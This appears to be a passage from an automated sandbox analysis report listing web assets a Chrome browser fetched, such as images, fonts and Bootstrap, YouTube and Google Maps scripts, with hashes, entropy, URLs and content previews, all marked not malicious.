                                              SHA-512:884BD3CE0D36AAF644A8C35FC1183CCA0FED93CA782A44B986CEF18688AF916BF7804E0CF8A572E2A9BDA629D000F5B0D524C5CAE1F7D40A0BDA04A04458649C
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (65299)
                                              Category:downloaded
                                              Size (bytes):78129
                                              Entropy (8bit):5.197397473920562
                                              Encrypted:false
                                              SSDEEP:1536:pppbTNR2t4NEdiK5J2w8gGzjJVPOW7tI+r9ixR2nwZY:T36WJr9ixi
                                              MD5:7CCD9D390D31AF98110F74F842EA9B32
                                              SHA1:A85E681624C91A106A514C31EACF80DE817B2CC3
                                              SHA-256:F5210FA3E7F0245A4C51EB7F280092C0EF99FDD28C45E17DAB8CC5854FDF4FD3
                                              SHA-512:A5AC783258178C710F7C2C1C24B4218A063BF8DF2BB7A6D5BD62C5C9432EC5286FD7BD17E774D1CC63E63E4666181864FA38A447C581338CA5EC0F563071EABE
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/js/bootstrap.bundle.min.js
                                              Preview:/*!. * Bootstrap v5.1.3 (https://getbootstrap.com/). * Copyright 2011-2021 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap=e()}(this,(function(){"use strict";const t="transitionend",e=t=>{let e=t.getAttribute("data-bs-target");if(!e||"#"===e){let i=t.getAttribute("href");if(!i||!i.includes("#")&&!i.startsWith("."))return null;i.includes("#")&&!i.startsWith("#")&&(i=`#${i.split("#")[1]}`),e=i&&"#"!==i?i.trim():null}return e},i=t=>{const i=e(t);return i&&document.querySelector(i)?i:null},n=t=>{const i=e(t);return i?document.querySelector(i):null},s=e=>{e.dispatchEvent(new Event(t))},o=t=>!(!t||"object"!=typeof t)&&(void 0!==t.jquery&&(t=t[0]),void 0!==t.nodeType),r=t=>o(t)?t.jquer
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:SVG Scalable Vector Graphics image
                                              Category:downloaded
                                              Size (bytes):8059
                                              Entropy (8bit):5.22083362492118
                                              Encrypted:false
                                              SSDEEP:96:+uAitNAfkdAKF1A9+Tri6lcEAjwTHq6KAhaTtPa62A0jojwJw5uwswwwVdZFdrYT:DBjJTekcyTKzTojvwvC
                                              MD5:D0B79120F3FAC9EB600DF85F52258737
                                              SHA1:B13C28ED9089327880DBCA8BD4EE1920BC88BA89
                                              SHA-256:42ACDD11DF788229E5D8B5ED1F4E02DF21557A703D8745B1A98C40CD2313E50F
                                              SHA-512:EAA67C4C4C5AFC09F27140E13B8469085C9B94B08DCB7FC570CCADFB98D66B1E8AF1380B6248698E78FAFC6A7F50D98A372C5FCEA1603E83102C73E9887DBF98
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/hero/4/Group%209.svg
                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="124.183" height="135.13" viewBox="0 0 124.183 135.13">. <defs>. <filter id="Rectangle_Copy_16" x="0" y="0" width="124.183" height="135.13" filterUnits="userSpaceOnUse">. <feOffset dy="3" input="SourceAlpha"/>. <feGaussianBlur stdDeviation="3" result="blur"/>. <feFlood flood-opacity="0.161"/>. <feComposite operator="in" in2="blur"/>. <feComposite in="SourceGraphic"/>. </filter>. <filter id="Donut_0" x="44.998" y="20.418" width="54.257" height="77.636" filterUnits="userSpaceOnUse">. <feOffset dy="3" input="SourceAlpha"/>. <feGaussianBlur stdDeviation="3" result="blur-2"/>. <feFlood flood-opacity="0.161"/>. <feComposite operator="in" in2="blur-2"/>. <feComposite in="SourceGraphic"/>. </filter>. <filter id="Donut_1" x="21.289" y="46.26" width="44.39" height="50.995" filterUnits="userSpaceOnUse">. <feOffset dy="3" input="SourceAlpha
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):7485
                                              Entropy (8bit):7.927313291848507
                                              Encrypted:false
                                              SSDEEP:192:CPlEnWIDHcmsaaKt42PR5cZfatX/vPB1uz:CUcXbsXcZytvvPB1uz
                                              MD5:7007AAADE16947162124A94AF9927682
                                              SHA1:3C64052CAB109443A4822E60E45547B7B1E531A2
                                              SHA-256:CC4382FA7041AA160C4899A070EB161B17F0852276F7C890B6CB023E283B28A5
                                              SHA-512:F64CE3DB9AE1BC0CEC881928CA41234AE7CFCBE1848CEC9C4A1E5C6E2B2B79FCD09444015737CCC580DC8B9129B61E4FCDE4ABD2301D104780540DF231D7D512
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/4.png
                                              Preview:.PNG........IHDR.......P......N......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.da4a7e5ef, 2022/11/22-13:50:07 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:6574AC7DD9DC11EDB0EAEA16EBC1DDF2" xmpMM:DocumentID="xmp.did:6574AC7ED9DC11EDB0EAEA16EBC1DDF2"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6574AC7BD9DC11EDB0EAEA16EBC1DDF2" stRef:documentID="xmp.did:6574AC7CD9DC11EDB0EAEA16EBC1DDF2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.I......IDATx..].t../y/....$.v. A@...X.E...V.J..G...L..x..{...hG+`+`.m..A.RQP.Q....e#d...K.....w..?.mY`..w.>...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (53030)
                                              Category:dropped
                                              Size (bytes):54308
                                              Entropy (8bit):5.731647926760164
                                              Encrypted:false
                                              SSDEEP:768:jqjtNP5aMOM8HX5i7tTbrMzzOb/4Ss5BRvO7LKvadUDjFpMNYzvae2wHJowr1H:jetV5aMVKX5AtjX/GFvO6vStwWwrF
                                              MD5:F9FDA7AE47BD6EEB2E8C6A2D4EBFB68A
                                              SHA1:F1F799BF28C4FD2939B9D224507514B79554ECAE
                                              SHA-256:299F6A05FBF616F8FCFBEB611778E4AEA9A31485F0C557E8746CB9C2FADC8AB4
                                              SHA-512:BB965DCC501F66A95480325799DEEC7DE1CD3900269925E5D8ED1D11F209E038CC7AD9E146C48129672151A0B81CA83880CA8F790A67D0C2C4337004F071D663
                                              Malicious:false
                                              Reputation:low
                                              Preview://# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==.(function(){function D(W){return W}var S=function(W){return D.call(this,W)},T=this||self,a=function(W,r,P,Q,p,R,X,g,d,E,M,H){for(H=(E=9,P);;)try{if(E==52)break;else if(E==W)H=P,E=8;else if(E==62)E=d&&d.createPolicy?Q:36;else{if(E==36)return g;if(E==13)return H=P,g;E==Q?(H=52,g=d.createPolicy(p,{createHTML:S,createScript:S,createScriptURL:S}),E=13):E==9?(g=R,d=T.trustedTypes,E=62):E==8?E=T.console?r:13:E==r&&(T.console[X](M.message),E=13)}}catch(y){if(H==P)throw y;H==52&&(M=y,E=W)}};(0,eval)(function(W,r){return(r=a(26,16,69,19,"ad",null,"error"))&&W.eval(r.createScript("1"))===1?function(P){return r.createScript(P)}:function(P){return""+P}}(T)(Array(Math.random()*7824|0).join("\n")+['//# sourceMappingURL=data:application/json;charset=utf-8;base6
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (568)
                                              Category:dropped
                                              Size (bytes):2440546
                                              Entropy (8bit):5.605899297237629
                                              Encrypted:false
                                              SSDEEP:24576:OF2WXHwMREkneFtJ3J6b9x381+Z50eqwGJfCo:22WXHBzeFtZJ6b9q1+ZIh
                                              MD5:18D3FFE23750BB19A0AE4F42100E0DCB
                                              SHA1:4A3D55A8A16CA835020CE0E71C5C9E423DAC83C5
                                              SHA-256:DC4E4B489C989B71573A2BB3C6FDE2E2681C94D7B4033396837CCDC8F867C155
                                              SHA-512:5D8ECB2D7B480DEABBB65259E04BD13330725F521490DB6B0E0335FBCDA02E747A25D92FC9BA05ECEA6ECC0D7E441E4437D2F17FE194961B1DF833F8F777B882
                                              Malicious:false
                                              Reputation:low
                                              Preview:var _yt_player={};(function(g){var window=this;/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC All Rights Reserved... Use of this source code is governed by an MIT-style license that can be. found in the LICENSE file at https://angular.dev/license.*/./*.. (The MIT License).. Copyright (C) 2014 by Vitaly Puzrin.. Permission is hereby granted, free of charge, to any person obtaining a copy. of this software and associated documentation files (the "Software"), to deal. in the Software without restriction, including without limitation the rights. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. copies of the Software, and to permit persons to whom the Software is. furnished to do so, subject to the following conditions:.. The above copyright notice and this permission notice shall be included in. all copies or substantial portions of the
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):2607
                                              Entropy (8bit):7.910351860503507
                                              Encrypted:false
                                              SSDEEP:48:8pG8ARoFJQf4ni/gWMzyqo+cn26sKJyz/zk/xk4lY0ixgGB+zc07:8pSRoFJQfcNyqa262/oy41ixgueb
                                              MD5:2ED04DEF040A8B75B1A403EC4384F0E3
                                              SHA1:0E9326D32D37121C24B06C86C78D2DC3C33875A6
                                              SHA-256:51B48CD82C0D1ABD2AEB00170FC184F29E5CA728BF930C16314EF95DBB1E7A83
                                              SHA-512:58A5064F8E8DF485297873243A7A5EAC4F972A3AA3FD70AF0301E42EC03281BAFF8A8F134934DD18C0C816AFA96B8C518F6BC51E6A7A2F11D1177F36F915167D
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE..U..Q....Nn..B.....J.....J..L.....S..@..Q..;..C.Q..O..I$.Y....F..M....[..R.P_.U\..U.En.Up&.V$.a..[..I..P.....x.........D.F...(.G.D...H.x..[...W..j1.We.K....T......<.h..P}...PW.ze.........a..Mv....]....IDATh...v.........EAR...TD..&&...?...PR.....Z.H*..?......./.........y;.D../...-.Z.JQ..a..(. <~A..d.h..d\g.Ba..aQQ....!..(..e".B.\.k. 4^.6..<.+9H$*..D..0.z+.r]..V..g~......D.U...*a.!Y../.!"...&..xK.z.$C*T.d....!.C./...^...g.V.W.G.&.%_.....,..J&.$.J.TJ...dm....C.-ASu."..ta..Q.S..'H.B..{.v..F..sJV.D....7.|......)Y5...=$...9.,.rJj..C.~/......Jm.h.../T)9._.=<|....."..<>><<<>.x....'.............o..?E... .|...a...*. .?~@.. ...\.....F..?...?w.1v.\1..zhA....B..WRkT.a...]...Mk.?....3.2m..x..r.V.0....JUPKw..,.l.. qo..o@.(...!....Px.Q.....o..B..%...R.P..\0..wk4.x5..R. .u.7).e]O.,i,.O.n........kP...tKL.t:]6.).gM2..Vw6^H.r. ..........a....ynj@Y.....H.m..G.g=..{f.k2.39.6^3.z3..e...V'.....`...._L2b..<..$W.6%....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (802)
                                              Category:dropped
                                              Size (bytes):3308
                                              Entropy (8bit):5.5083394341383904
                                              Encrypted:false
                                              SSDEEP:48:fHKvPwII+sSQx+GzETrVdA6wcA411GbwIkBpCN63K91jJahGIdL2wl+nsIEGbR4t:fAwzx/5YTrVdB17I+puX7jECwljI1P2L
                                              MD5:2334D2C9424FC203B6672293A25994E8
                                              SHA1:D4CEFB27836F8BE576CC45C9BB0F5BA3AD281E52
                                              SHA-256:CE8FDEE05819227CE1A5EEC4B1B59B68599B26A414F5CA5343BFF490D4A6ED56
                                              SHA-512:11AC863540AB8EFD442986151E3CE798EE53FDC13C03F369380D5D37DE2D3405A1502AF88CD98BAC81E0ABE62B65B11F25F9DEFEDA94645D8B2995AB4A338D71
                                              Malicious:false
                                              Reputation:low
                                              Preview:google.maps.__gjsload__('geometry', function(_){var zsa=function(a,b){return Math.abs(_.fj(b-a,-180,180))},Asa=function(a,b,c,d,e){if(!d){c=zsa(a.lng(),c)/zsa(a.lng(),b.lng());if(!e)return e=Math.sin(_.Di(a.lat())),e=Math.log((1+e)/(1-e))/2,b=Math.sin(_.Di(b.lat())),_.Ei(2*Math.atan(Math.exp(e+c*(Math.log((1+b)/(1-b))/2-e)))-Math.PI/2);a=e.fromLatLngToPoint(a);b=e.fromLatLngToPoint(b);return e.fromPointToLatLng(new _.al(a.x+c*(b.x-a.x),a.y+c*(b.y-a.y))).lat()}e=_.Di(a.lat());a=_.Di(a.lng());d=_.Di(b.lat());b=_.Di(b.lng());c=_.Di(c);return _.fj(_.Ei(Math.atan2(Math.sin(e)*.Math.cos(d)*Math.sin(c-b)-Math.sin(d)*Math.cos(e)*Math.sin(c-a),Math.cos(e)*Math.cos(d)*Math.sin(a-b))),-90,90)},Bsa=function(a,b){a=new _.Mj(a,!1);b=new _.Mj(b,!1);return a.equals(b)},Csa=function(a,b){const c=[];let d=[0,0],e;for(let f=0,g=_.Yi(a);f<g;++f)e=b?b(a[f]):a[f],rA.tE(e[0]-d[0],c),rA.tE(e[1]-d[1],c),d=e;return c.join("")},sA={containsLocation:function(a,b){a=_.Rj(a);const c=_.fj(a.lng(),-180,180),d=!!b.get
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1000x800, components 3
                                              Category:downloaded
                                              Size (bytes):89632
                                              Entropy (8bit):7.969434539089286
                                              Encrypted:false
                                              SSDEEP:1536:P6eni2f67266l+UGrf6kNXNfgcfRbq9DpWEBoVDkwP8kamE2nwxF+JUei:PjiMAbu+UGeklN7fRbqRUuoVDrZ42nwB
                                              MD5:A843DE85098B94B4831BB3DDD9DEF238
                                              SHA1:0E04E5AE42E6EECA7912E47AE6170E40749DF129
                                              SHA-256:AE6D3BA29CCFFEAD6B5E634A00AFB83B1DB01E96E29B90AAF2A693AC64B51EBB
                                              SHA-512:936DC293D2A4BE8655231DD4265FE3979CC10EA8CD0694D7346F7126A89157F456811BE530F0691902657C022C86EB3147891782320868A4DD01369749E3E8A3
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/services/4/46cd0976d13895f96aeaa080fed61a69.jpg
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:3A43EAB0934211EDAE26F75319497C35" xmpMM:DocumentID="xmp.did:3A43EAB1934211EDAE26F75319497C35"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3A43EAAE934211EDAE26F75319497C35" stRef:documentID="xmp.did:3A43EAAF934211EDAE26F75319497C35"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............C....<..^...........................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):17877
                                              Entropy (8bit):7.75188401813859
                                              Encrypted:false
                                              SSDEEP:384:4YNg7fYRYMpf/FCER7pqjk39K8ThICXDlb+niOHBneD:4Yyb3Mpf/UEKO9tiCXDF++D
                                              MD5:15A1BFF5ECE221C213CC97478CD07C45
                                              SHA1:8D33FD40A0613B12C4F647A2CDBFFDD85DF6BAAE
                                              SHA-256:007A1B9A7A05EA2DC30DF7131D58BC79D657282B2B2B4DCDACBA120566B27187
                                              SHA-512:2A72F80CD9CCFDD180938E36A034AC0F607FD0281B4AEB311BE2E5125AF1B743171AEEDCE6DB887586E8490BA0C876CDDA0F78CC9DED382AF128EAD3C71E5236
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Web Open Font Format (Version 2), TrueType, length 24828, version 1.0
                                              Category:downloaded
                                              Size (bytes):24828
                                              Entropy (8bit):7.990360612411157
                                              Encrypted:true
                                              SSDEEP:384:FoFi63kz/KPGEz0ttVXB5v2g6Vd0V5Y5QGEc8ndwxevpho08fFoRH9e8Q1Cm:FoiSPKtvXOgD5CfUndBvphYoRo
                                              MD5:88F6AF5D95854ACEDB2F00F6BCF69E96
                                              SHA1:676CD349B361089F3956889E2F4D4DBC7C44BFB6
                                              SHA-256:F4B2595EF7071EA9E5FDF4AC7DD0A3C2A73DD6DED0792A975F322D2E02209705
                                              SHA-512:5BDFE0CF9EF5DA766341ABE4C0F9B6B8A779D7ABAB4040EC187586F9B17B01D8074D883620C057C0CF5C3D804C51B5C87A1B2B6334FF88BF7A05349D496EAEA3
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/fonts/sora/Sora-Medium.woff2
                                              Preview:wOF2......`........X..`.........................?FFTM..x...V..x.`........`..E.....6.$.... ..z....*.G0;L^.....(Jk.O.~B..X..l.....,...AHA.p.....I.rX..\..l.0b*#..1i....j....a.c?p...o...!.....)...k.[..W........-.W;`.;..w.....'F........x.57.....O7j.<.....cDu.2d.E]x.#.Q`.SLd...M.^.x...a9...o...C.c..y....{..B...uc/.I.......Q....]..csj.]9y....w...&*)....%1,-..4..H$....@"..y....2.X....l.Xe..0...1.F.@2....X..,..c.#F...X..V...y.w`.y.......S..e..9x.9.D..".]..7.-........... ..?.......`.Q...r...;.....$l..%zqL..K..:.nL....P....Rd...........k.h.)!ed..Cec.Wr#...mo).l).O.>..76.......F!.J2Y.!d.....x$.......?.d'.I6.t....5."..A...+....U%..._..S..AQQ.........w.w.]........V\W.y.J...}J...!.. ....>...mWDlh....!.df.9d.-d.9?%..:.@ 8...............]..-V.L..J.;s^...F!...K..;..\......2..@{./9....t..C.U.E.B...},=.{..-.U.*C......t.{.../eZ9.J....w.B.V.K.L..B....KK.g....<8.3if.....sV.u...e...[F.!..N...4...........K...[.*Y......!..'Y.C..Hr.):Ew......y............
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 640x480, Scaling: [none]x[none], YUV color, decoders should clamp
                                              Category:dropped
                                              Size (bytes):35420
                                              Entropy (8bit):7.993905197867692
                                              Encrypted:true
                                              SSDEEP:768:AbMqJ53jmtt1WCS6r2xzx04mDKDwVhM6SK5riZyN3NgJPaJf:+Mqv3KoCSRxqKDwT5rH9gJ
                                              MD5:B78A937F1C5681742125A37AC54D8792
                                              SHA1:3A43852226F0140C45E1EDEBB9739BA44FDB893D
                                              SHA-256:9199894EF5EE5348ACAE329010B59EEC7E0864B6899B43B3BCE65CA0058D25F6
                                              SHA-512:5027B03296634D14B23B412B47E4AD82C74D1762A5B92687D2D93B2F12602BF74C8F7A8ABD223AE7FE0E8108087EB07505EBFCC33C72A4E5FAC53F65329EB72D
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFFT...WEBPVP8 H...P....*....>m0.G.".)&.;y ..en-.]O.......q...N|...O*........c.X.........{y.Z..%.^y..V3]...U.......[.../6.N.....+.l....y....z.8.g.}.........+.........i..~..O.......@."z......?..>......`/0.......w...7...?......../......v..............c...+.W...2.^d....y... ..@+.W...2.^d....y... ..*...qg'.0E.....^..]... ...g.0E..hob.5......."pU..E,0..A..q.A.mj.B.e.\.t..}.).Km...3K.K.8#.1..f.Q..3.CC..a./..G..h{.*..rfn.I..oO.m...A.1.XF.......[....s.68r..8t....MwO...I5......GN...M;`.E.....:.B.@N....|T[..].;.<...e...M...s.4.x...'...`...d..B...#\...h.j....../......8.3.....<.yAi..O..9....*...f......!...:.R.....z.Oh.>+..=.can.e..3.........xutE..+.e..wK..2w...![>P>`.!I...2.mE......3.........<...G/..f-u..zQ:.C.......Q.mutU.uGx....>.c....s....<...p.m.rG..0.......v;......T....*..x...C.~..Da....I.....K..[.D..-.{.|.9..-.c...$e..L......K....5.\..aFBPk..^Y....m.=.F.\*.S.O......x...Q.7rU..,.R....b...>. ..##.I...fS8..y....s@.D{r$Y.{F.b..{....0.$:.+<={c.,1
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):9954
                                              Entropy (8bit):7.444383224222293
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKw/dKbK7Ww51FAUTP8MXAxnzEHNLprWkCKY:4YNg7FKKqw51FvAMcnzE7yDKY
                                              MD5:29824E7F7EFE6B2BA898A2BA8D30BD0B
                                              SHA1:6284340432DCCADB0537A12E3882244CFCB53AFB
                                              SHA-256:5592337B244C2F5F4B299303482685FF84770908D70BB010B7F96B0E93DE65E3
                                              SHA-512:428936CE8EA686213F3FAC5228A79527120D41BA42296F02FCADB0C807A4DEA1773F0FE839F5743A61C8E8DF249904095AB44430F10FFBBDC5F23ABFB2EFCFF2
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/11/e379a43de422fd1fcd9786ef32a1df4e.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1000x800, components 3
                                              Category:dropped
                                              Size (bytes):62677
                                              Entropy (8bit):7.9706972729143395
                                              Encrypted:false
                                              SSDEEP:1536:kqHMKYYxDtUJv6diNTcYukL4fi85gjAbuDGpzUARD:kqHMKYkQv6YNTc04EEbuKhx
                                              MD5:65E847E389A33E68635095B712A7BFEF
                                              SHA1:451AC0DC83458839D3F11808C4CD9C444969C001
                                              SHA-256:5502EFD73532795349A6B33DA7E2D4C344649F1A8C9F7065389C91D9EF7A4B93
                                              SHA-512:8752DDFD0BF28C3169FAFA5BBDAB5298D2508BC67BFEB3A83DF57830B266F5A50500A6DA13BCD36B8366720C639FB6E412742F8328BB549DA8A547676209B1DD
                                              Malicious:false
                                              Reputation:low
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:E451D927934411EDB6E1A8D9CFB88D1B" xmpMM:DocumentID="xmp.did:E451D928934411EDB6E1A8D9CFB88D1B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E451D925934411EDB6E1A8D9CFB88D1B" stRef:documentID="xmp.did:E451D926934411EDB6E1A8D9CFB88D1B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............>...................................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3968
                                              Entropy (8bit):7.930577948764692
                                              Encrypted:false
                                              SSDEEP:96:XGvZ3UIRVbyd4TngSPyLZ4yr6GF/cbhwp6+q7:WvZ3UIH+d4UEy99pGwE+q7
                                              MD5:35AB5D2133D9B21081D15027168AB1EF
                                              SHA1:25B3938E1F825E9994D3DD0AF52230B66512AE40
                                              SHA-256:983BF1541D9E1F8A6940C44C6F6120001470DD36E666E1ABDC0A2AE8CBF5A659
                                              SHA-512:A4D896E8AD01FBD5B2DB5AC098F07E73C3930452F637C700589E8222391E55EFCDEE4D7F43BF7304727BE19302C4890029B8046FFD4B202E3895B2386131DBAB
                                              Malicious:false
                                              Reputation:low
